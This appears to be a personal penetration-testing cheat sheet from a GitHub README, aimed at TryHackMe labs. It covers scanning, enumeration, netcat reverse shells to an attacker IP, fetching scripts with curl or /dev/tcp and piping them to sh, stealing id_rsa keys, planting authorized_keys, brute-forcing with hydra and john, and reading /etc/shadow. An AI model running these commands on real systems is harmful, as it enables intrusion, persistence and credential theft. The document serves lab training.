Exploits

Kali linux

Install Strings

#Strings
apt-get install binutils

Install searchsploit

sudo apt update && sudo apt -y install exploitdb

Install Terminator

sudo apt-get update

#Terminal
sudo apt-get install terminator

#Strings
apt-get install binutils

Use Terminator

#Start
Terminator

#horizontal break
ctrl+shift+e

#Vertical break
ctrl+shift+o

file (check file type)

file 65461641946198196984910sd4949sdfsdf

Steganography (Hidden Files Inside Images/files)

#Create image with hidden zip
cat image.jpg secret.zip > ostechnix.jpg

#Unzip
unzip -t ostechnix.jpg

or

mv ostechnix.jpg ostechnix.zip
unzip -t ostechnix.zip

Install/Download linpeas.sh (System checker)

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

Install Dirbuster (webserver directory enumeration)

sudo apt-get install dirbuster

Install Gobuster (webserver directory enumeration)

sudo apt-get install gobuster

TryHAckMe

start vpn connection

sudo openvpn <vpnfile.ovpn>

#VPN interface would probably be tun0

1. Initial Poke

Wordlists

Wordlists in kali

ls -lh /usr/share/wordlists/

1.1 Port scan

nmap

nmap -sC -sV -oN /home/nmap/initial <victim ip>


#switchs
-sC: equivalent to --script=default
-sV: Probe open ports to determine service/version info
-oN <file>: Output scan in normal, XML, s|<rIpt kIddi3 and Grepable format, respectively, to the given filename.

1.2 web (enum)

gobuster

gobuster -w /opt/Dirbuster-0.12/directory-list-2.3-medium.txt -u http://<victimIP>

2. Create reverse connection

2.1 Netcat

netcat listner on attacker box

nc –lvp 4444

netcat from victim

#Linux
nc <attacker IP> 4444 –e /bin/bash
#Windows
nc.exe <attacker IP> 4444 –e cmd.exe

--> Cheatsheet for other services (PHP,Python,Pearl,Ruby,Golang,Bash)

3. Gather information about system

linPEAS

#on victim
linpeas.sh

#Local network
sudo python -m SimpleHTTPServer 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

#Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

#Excute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

linEnum

https://github.com/rebootuser/LinEnum

Victim filespace

/dev/shm

download files between machines

Create a simple webserver on victim

python -m SimpleHTTPServer

On attacker we download the file

wget http://10.10.0.50:8000/id_rsa

Create RSA keys

#move to home dir
cd /home/username

#Create folder
mkdir .ssh

#Create key pair
ssh-keygen

#display keys
cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub

#Move the pub-key to victim users dir
cat ~/.ssh/id_rsa.pub > .ssh/authorized_keys
cat ~/.ssh/id_rsa.pub > /home/username/.ssh/authorized_keys

Connect SSH

ssh -i id_rsa username@ip

4. Brute force

4.1 Hydra

Crack password of known user

hydra -l <username> -P <wordlist> ssh://<victimIP>

hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/

3.2 JohnTheRipper

Crack hashes

john --wordlist=password.lst hashes-3.des.txt

Crack rsa-id/ssh-token Link

#Get ssh2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py

#Convert rsa-id/ssh-token to john readable format
python ssh2john.py id_rsa > id_rsa.hash

#Brute force the rsa key
john --wordlist=wordlist.txt id_rsa.hash

Priv esc

https://gtfobins.github.io/

Metasploit

SearchSploit

SearchSploit

msfcli

METERPRETER

sed

ls -l /bin/sed

#Read file
sed '' /etc/shadow
sed '' .flag

BinWalk

check content of file

binwalk 'filename.bin'

tedelm / exploits Goto Github PK

exploits's Introduction